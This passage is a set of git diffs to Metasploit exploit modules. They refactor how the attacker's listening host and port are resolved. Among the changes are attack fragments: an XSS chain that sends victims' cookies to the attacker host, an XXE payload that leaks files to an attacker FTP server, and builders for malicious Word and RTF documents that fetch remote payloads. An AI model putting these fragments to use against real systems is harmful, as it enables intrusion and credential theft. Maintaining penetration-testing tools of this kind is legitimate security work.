+++ b/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha(4)
     @temp_folder = "/Windows/Temp"
     register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       lhost = Rex::Socket.source_address('50.50.50.50')
     else
-      lhost = datastore['SRVHOST']
+      lhost = srvhost
     end
     payload_src = lhost
     payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

--- a/modules/exploits/windows/fileformat/office_word_hta.rb
+++ b/modules/exploits/windows/fileformat/office_word_hta.rb
@@ -77,10 +77,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_uri
     uri_maxlength = 112
 
-    host = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
     scheme = datastore['SSL'] ? 'https' : 'http'
 
-    uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
+    uri = "#{scheme}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}/#{Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
     uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
     uri.delete!("\n")
     uri.delete!('\\x')

--- a/modules/exploits/windows/fileformat/office_word_hta.rb
+++ b/modules/exploits/windows/fileformat/office_word_hta.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_uri
     uri_maxlength = 112
 
-    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+    host = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
     scheme = datastore['SSL'] ? 'https' : 'http'
 
     uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"

--- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
+++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       WallpaperStyle=10
 
       [VisualStyles]
-      Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name}
+      Path=\\\\#{srvhost}\\#{@share}\\#{@file_name}
       ColorStyle=NormalColor
       Size=NormalSize
 

--- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
+++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       WallpaperStyle=10
 
       [VisualStyles]
-      Path=\\\\#{srvhost}\\#{@share}\\#{@file_name}
+      Path=\\\\#{srvhost_addr}\\#{@share}\\#{@file_name}
       ColorStyle=NormalColor
       Size=NormalSize
 

--- a/modules/exploits/windows/fileformat/word_msdtjs_rce.rb
+++ b/modules/exploits/windows/fileformat/word_msdtjs_rce.rb
@@ -45,8 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultOptions' => {
           'DisablePayloadHandler' => false,
           'FILENAME' => 'msf.docx',
-          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
-          'SRVHOST' => Rex::Socket.source_address('1.2.3.4')
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
         },
         'Targets' => [
           [ 'Microsoft Office Word', {} ]
@@ -83,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
+    uri = "#{@proto}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{normalize_uri(@my_resources.first.to_s)}.ps1"
 
     dummy = ''
     (1..random_int(61, 100)).each do |_n|
@@ -118,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
     end
 
-    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{normalize_uri(@my_resources.first.to_s)}.html"
     @docx.each do |entry|
       case entry[:fname]
       when 'word/_rels/document.xml.rels'
@@ -180,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def build_rtf
     print_status('Generating a malicious rtf file')
 
-    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{normalize_uri(@my_resources.first.to_s)}.html"
     uri_space = 76 # this includes the required null character
     uri_max = uri_space - 1
     if uri.length > uri_max

--- a/modules/exploits/windows/fileformat/word_msdtjs_rce.rb
+++ b/modules/exploits/windows/fileformat/word_msdtjs_rce.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
 
     dummy = ''
     (1..random_int(61, 100)).each do |_n|
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
     end
 
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
     @docx.each do |entry|
       case entry[:fname]
       when 'word/_rels/document.xml.rels'
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def build_rtf
     print_status('Generating a malicious rtf file')
 
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
     uri_space = 76 # this includes the required null character
     uri_max = uri_space - 1
     if uri.length > uri_max

--- a/modules/exploits/windows/fileformat/word_mshtml_rce.rb
+++ b/modules/exploits/windows/fileformat/word_mshtml_rce.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"
+    uri = "#{@proto}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{normalize_uri(@my_resources.first.to_s)}.cab"
     inf = "#{File.basename(@my_resources.first)}.inf"
 
     file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')
@@ -225,7 +225,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
     end
 
-    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{normalize_uri(@my_resources.first.to_s)}.html"
     @docx.each do |entry|
       case entry[:fname]
       when 'word/document.xml'
@@ -322,9 +322,6 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('CVE-2021-40444: Generate a malicious docx file')
 
     @proto = (datastore['SSL'] ? 'https' : 'http')
-    if srvhost == '0.0.0.0'
-      datastore['SRVHOST'] = Rex::Socket.source_address
-    end
 
     template_path = get_template_path
     unless File.extname(template_path).match(/\.docx$/i)

--- a/modules/exploits/windows/fileformat/word_mshtml_rce.rb
+++ b/modules/exploits/windows/fileformat/word_mshtml_rce.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"
     inf = "#{File.basename(@my_resources.first)}.inf"
 
     file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')
@@ -225,7 +225,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
     end
 
-    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    uri = "#{@proto}://#{srvhost}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
     @docx.each do |entry|
       case entry[:fname]
       when 'word/document.xml'
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('CVE-2021-40444: Generate a malicious docx file')
 
     @proto = (datastore['SSL'] ? 'https' : 'http')
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       datastore['SRVHOST'] = Rex::Socket.source_address
     end
 

--- a/modules/exploits/windows/ftp/ayukov_nftp.rb
+++ b/modules/exploits/windows/ftp/ayukov_nftp.rb
@@ -38,9 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512
         ],
         'Privileged' => false,
-        'DefaultOptions' => {
-          'SRVHOST' => '0.0.0.0',
-        },
         'DisclosureDate' => '2017-10-21',
         'DefaultTarget' => 0,
         'Notes' => {
@@ -59,18 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = srvhost
-    if srv_ip_for_client == '0.0.0.0'
-      if datastore['LHOST']
-        srv_ip_for_client = datastore['LHOST']
-      else
-        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
-      end
-    end
-
-    srv_port = datastore['SRVPORT']
-
-    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
+    print_status("Please ask your target(s) to connect to #{Rex::Socket.to_authority(srvhost_addr, srvport)}")
     super
   end
 

--- a/modules/exploits/windows/ftp/ayukov_nftp.rb
+++ b/modules/exploits/windows/ftp/ayukov_nftp.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = datastore['SRVHOST']
+    srv_ip_for_client = srvhost
     if srv_ip_for_client == '0.0.0.0'
       if datastore['LHOST']
         srv_ip_for_client = datastore['LHOST']

--- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb
@@ -116,8 +116,8 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
-    src_port = datastore['SRVPORT'].to_i
+    src_ip = srvhost_addr
+    src_port = srvport
 
     # Prepare active mode: Convert the IP and port for active mode
     src_ip = src_ip.gsub(/\./, ',')

--- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
     src_port = datastore['SRVPORT'].to_i
 
     # Prepare active mode: Convert the IP and port for active mode

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = datastore['SRVHOST']
+    srv_ip_for_client = srvhost
     if srv_ip_for_client == '0.0.0.0'
       if datastore['LHOST']
         srv_ip_for_client = datastore['LHOST']

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Privileged' => false,
         'DefaultOptions' => {
-          'SRVHOST' => '0.0.0.0',
           'EXITFUNC' => 'thread'
         },
         'DisclosureDate' => '2017-03-04',
@@ -54,18 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = srvhost
-    if srv_ip_for_client == '0.0.0.0'
-      if datastore['LHOST']
-        srv_ip_for_client = datastore['LHOST']
-      else
-        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
-      end
-    end
-
-    srv_port = datastore['SRVPORT']
-
-    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
+    print_status("Please ask your target(s) to connect to #{Rex::Socket.to_authority(srvhost_addr, srvport)}")
     super
   end
 

--- a/modules/exploits/windows/ftp/labf_nfsaxe.rb
+++ b/modules/exploits/windows/ftp/labf_nfsaxe.rb
@@ -37,9 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Windows Universal', { 'Ret' => 0x6801549F } ]
         ],
         'Privileged' => false,
-        'DefaultOptions' => {
-          'SRVHOST' => '0.0.0.0',
-        },
         'DisclosureDate' => '2017-05-15',
         'DefaultTarget' => 0,
         'Notes' => {
@@ -58,18 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = srvhost
-    if srv_ip_for_client == '0.0.0.0'
-      if datastore['LHOST']
-        srv_ip_for_client = datastore['LHOST']
-      else
-        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
-      end
-    end
-
-    srv_port = datastore['SRVPORT']
-
-    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
+    print_status("Please ask your target(s) to connect to #{Rex::Socket.to_authority(srvhost_addr, srvport)}")
     super
   end
 

--- a/modules/exploits/windows/ftp/labf_nfsaxe.rb
+++ b/modules/exploits/windows/ftp/labf_nfsaxe.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = datastore['SRVHOST']
+    srv_ip_for_client = srvhost
     if srv_ip_for_client == '0.0.0.0'
       if datastore['LHOST']
         srv_ip_for_client = datastore['LHOST']

--- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb
+++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb
@@ -109,8 +109,8 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
-    src_port = datastore['SRVPORT'].to_i
+    src_ip = srvhost_addr
+    src_port = srvport
 
     # Prepare active mode: Convert the IP and port for active mode
     src_ip = src_ip.gsub(/\./, ',')

--- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb
+++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
     src_port = datastore['SRVPORT'].to_i
 
     # Prepare active mode: Convert the IP and port for active mode

--- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb
+++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
+    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : srvhost
     src_port = datastore['SRVPORT'].to_i
 
     # Prepare active mode: Convert the IP and port for active mode

--- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb
+++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb
@@ -124,8 +124,8 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : srvhost
-    src_port = datastore['SRVPORT'].to_i
+    src_ip = srvhost_addr
+    src_port = srvport
 
     # Prepare active mode: Convert the IP and port for active mode
     src_ip = src_ip.gsub(/\./, ',')

--- a/modules/exploits/windows/ftp/scriptftp_list.rb
+++ b/modules/exploits/windows/ftp/scriptftp_list.rb
@@ -74,10 +74,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def setup
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       lhost = Rex::Socket.source_address('50.50.50.50')
     else
-      lhost = datastore['SRVHOST']
+      lhost = srvhost
     end
 
     ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"

--- a/modules/exploits/windows/ftp/scriptftp_list.rb
+++ b/modules/exploits/windows/ftp/scriptftp_list.rb
@@ -74,13 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def setup
-    if srvhost == '0.0.0.0'
-      lhost = Rex::Socket.source_address('50.50.50.50')
-    else
-      lhost = srvhost
-    end
-
-    ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"
+    ftp_file = "OPENHOST('#{srvhost_addr}','ftp','ftp')\r\n"
     ftp_file << "SETPASSIVE(ENABLED)\r\n"
     ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"
     ftp_file << "CLOSEHOST\r\n"

--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -60,9 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def windows_stager
-    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    execute_cmdstager({ temp: '.', tftphost: tftphost })
+    print_status("Sending request to #{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}")
+    execute_cmdstager({ temp: '.', tftphost: srvhost_addr })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")

--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/windows/http/cogent_datahub_command.rb
+++ b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -388,7 +388,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def primer
     print_status("Sending injection...")
-    res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll")
+    res = send_injection("\\\\\\\\#{srvhost_addr}\\\\#{@share_name}\\\\#{@basename}.dll")
     if res
       print_error("Unexpected answer")
     end
@@ -401,13 +401,7 @@ class MetasploitModule < Msf::Exploit::Remote
       @extensions = "dll"
       @system_commands_file = rand_text_alpha_lower(4)
 
-      if (srvhost == '0.0.0.0')
-        @myhost = Rex::Socket.source_address('50.50.50.50')
-      else
-        @myhost = srvhost
-      end
-
-      @exploit_unc = "\\\\#{@myhost}\\"
+      @exploit_unc = "\\\\#{srvhost_addr}\\"
 
       if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
         fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')

--- a/modules/exploits/windows/http/cogent_datahub_command.rb
+++ b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -401,10 +401,10 @@ class MetasploitModule < Msf::Exploit::Remote
       @extensions = "dll"
       @system_commands_file = rand_text_alpha_lower(4)
 
-      if (datastore['SRVHOST'] == '0.0.0.0')
+      if (srvhost == '0.0.0.0')
         @myhost = Rex::Socket.source_address('50.50.50.50')
       else
-        @myhost = datastore['SRVHOST']
+        @myhost = srvhost
       end
 
       @exploit_unc = "\\\\#{@myhost}\\"

--- a/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
+++ b/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
@@ -76,14 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def srv_host
-    if (srvhost == '0.0.0.0') || (srvhost == '::')
-      return datastore['URIHOST'] || Rex::Socket.source_address(rhost)
-    end
-
-    return srvhost
-  end
-
   def check
     # Make sure it's ADAudit Plus by requesting the root and checking the title
     res1 = send_request_cgi(
@@ -205,19 +197,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Generate a unique callback URL
     path = "/#{rand_text_alpha(rand(8..15))}.dtd"
-    full_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{path}"
+    full_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{path}"
 
     # Send the username anonymous and no password so the server doesn't log in
     # with the password "Java1.8.0_51@" which is detectable
     # We use `end_tag` at the end so we can detect when the listing is over
     end_tag = rand_text_alpha(rand(8..15))
-    ftp_url = "ftp://anonymous:password@#{srv_host}:#{datastore['SRVPORT_FTP']}/%file;#{end_tag}"
+    ftp_url = "ftp://anonymous:password@#{Rex::Socket.to_authority(srvhost_addr, datastore['SRVPORT_FTP'])}/%file;#{end_tag}"
     serve_http_file(path, "<!ENTITY % all \"<!ENTITY send SYSTEM '#{ftp_url}'>\"> %all;")
 
     # Start a server to handle the reverse FTP connection
     ftp_server = Rex::Socket::TcpServer.create(
       'LocalPort' => datastore['SRVPORT_FTP'],
-      'LocalHost' => srvhost,
+      'LocalHost' => bindhost,
       'Comm' => select_comm,
       'Context' => {
         'Msf' => framework,
@@ -360,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote
         # the user's temp folder while it waits for more data
         http_server = Rex::Socket::TcpServer.create(
           'LocalPort' => datastore['SRVPORT_HTTP2'],
-          'LocalHost' => srv_host,
+          'LocalHost' => bindhost,
           'Comm' => select_comm,
           'Context' => {
             'Msf' => framework,
@@ -400,7 +392,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Trigger the XXE to get file listings
     path = "/#{rand_text_alpha(rand(8..15))}.jar!/file.txt"
-    full_url = "http://#{srv_host}:#{datastore['SRVPORT_HTTP2']}#{path}"
+    full_url = "http://#{Rex::Socket.to_authority(srvhost_addr, datastore['SRVPORT_HTTP2'])}#{path}"
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,

--- a/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
+++ b/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
@@ -77,11 +77,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def srv_host
-    if (datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::')
+    if (srvhost == '0.0.0.0') || (srvhost == '::')
       return datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     end
 
-    return datastore['SRVHOST']
+    return srvhost
   end
 
   def check
@@ -217,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Start a server to handle the reverse FTP connection
     ftp_server = Rex::Socket::TcpServer.create(
       'LocalPort' => datastore['SRVPORT_FTP'],
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'Comm' => select_comm,
       'Context' => {
         'Msf' => framework,

--- a/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
+++ b/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
@@ -57,7 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [ true, 'The URI of the NorthStar C2 Application', '/']),
         OptBool.new('KILL', [ false, 'Kill the NorthStar C2 agent', false])
       ]

--- a/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
+++ b/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
@@ -208,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def srvhost
-    datastore['SRVHOST']
+    srvhost
   end
 
   def primer

--- a/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
+++ b/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
@@ -57,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('TARGETURI', [ true, 'The URI of the NorthStar C2 Application', '/']),
         OptBool.new('KILL', [ false, 'Kill the NorthStar C2 agent', false])
       ]
@@ -235,7 +236,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
     fail_with(Failure::BadConfig, 'SRVPORT and FETCH_SRVPORT must be different') if datastore['SRVPORT'] == datastore['FETCH_SRVPORT']
     super
   end

--- a/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
+++ b/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [ true, 'The URI of the NorthStar C2 Application', '/']),
         OptBool.new('KILL', [ false, 'Kill the NorthStar C2 agent', false])
       ]
@@ -207,17 +207,14 @@ class MetasploitModule < Msf::Exploit::Remote
     text.chars.map.with_index { |char, i| (char.ord ^ key[i % key.length].ord).chr }.join
   end
 
-  def srvhost
-    srvhost
-  end
-
   def primer
     @xss_response_received = false
     vprint_status('Sending XSS')
     # divide up the host length so that it fits in our payload
-    h1 = srvhost[0...srvhost.length / 2]
-    h2 = srvhost[srvhost.length / 2..]
-    sid_payloads = ['*/</script><', '*/i.src=u/*', '*/new Image;/*', '*/var i=/*', "*/s+h+p+'/'+c;/*", '*/var u=/*', "*/'http://';/*", '*/var s=/*', "*/':#{datastore['SRVPORT']}';/*", '*/var p=/*', '*/a+b;/*', '*/var h=/*', "*/'#{h2}';/*", '*/var b=/*', "*/'#{h1}';/*", '*/var a=/*', '*/d.cookie;/*', '*/var c=/*', '*/document;/*', '*/var d=/*', '</td><script>/*']
+    host = srvhost_addr
+    h1 = host[0...host.length / 2]
+    h2 = host[host.length / 2..]
+    sid_payloads = ['*/</script><', '*/i.src=u/*', '*/new Image;/*', '*/var i=/*', "*/s+h+p+'/'+c;/*", '*/var u=/*', "*/'http://';/*", '*/var s=/*', "*/':#{srvport}';/*", '*/var p=/*', '*/a+b;/*', '*/var h=/*', "*/'#{h2}';/*", '*/var b=/*', "*/'#{h1}';/*", '*/var a=/*', '*/d.cookie;/*', '*/var c=/*', '*/document;/*', '*/var d=/*', '</td><script>/*']
     sid_payloads.each do |pload|
       pload = "N#{pload}q"
       vprint_status("Sending: #{pload}")

--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -62,9 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def windows_stager
-    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    execute_cmdstager({ temp: '.', tftphost: tftphost })
+    print_status("Sending request to #{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}")
+    execute_cmdstager({ temp: '.', tftphost: srvhost_addr })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")

--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
